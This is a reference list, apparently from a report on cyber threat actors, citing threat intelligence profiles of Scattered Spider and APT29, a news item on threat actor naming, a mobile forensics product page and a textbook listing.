- Octo Tempest Threat Actor Profile – CyberWire, accessed June 24, 2025, https://thecyberwire.com/podcasts/microsoft-threat-intelligence/5/notes
- hc3 tlp clear threat actor profile scattered spider-10-24-2024.pdf – American Hospital Association, accessed June 24, 2025, https://www.aha.org/system/files/media/file/2024/10/hc3%20tlp%20clear%20threat%20actor%20profile%20scattered%20spider-10-24-2024.pdf
- Microsoft, CrowdStrike, other cyber firms collaborate on threat actor taxonomy, accessed June 24, 2025, https://www.cybersecuritydive.com/news/microsoft-crowdstrike-other-cyber-firms-collaborate-on-threat-actor-taxon/749614/
- Threat Actor Profile – Cybanetix, accessed June 24, 2025, https://cybanetix.com/wp-content/uploads/2025/05/Scattered-Spider-Threat-Actor-Profile.pdf
- Threat Actor Profiles – SOCRadar® Cyber Intelligence Inc., accessed June 24, 2025, https://socradar.io/category/threat-actor-profiles/
- XRY — Mobile Data Forensic Phone Extraction & Recovery – MSAB, accessed June 24, 2025, https://www.msab.com/product/xry-extract/
- Cyber Crime & Cyber Terrorism (RRPHE RENTAL Edition): University of Detroit Mercy, accessed June 24, 2025, https://www.bkstr.com/udmercystore/product/cyber-crime—cyber-terrorism–rrphe-rental-edition–369414-1
- THREAT PROFILE: APT29 – Blackpoint Cyber, accessed June 24, 2025, https://blackpointcyber.com/wp-content/uploads/2024/06/Threat-Profile-APT29_Blackpoint-Adversary-Pursuit-Group-APG_2024.pdf?
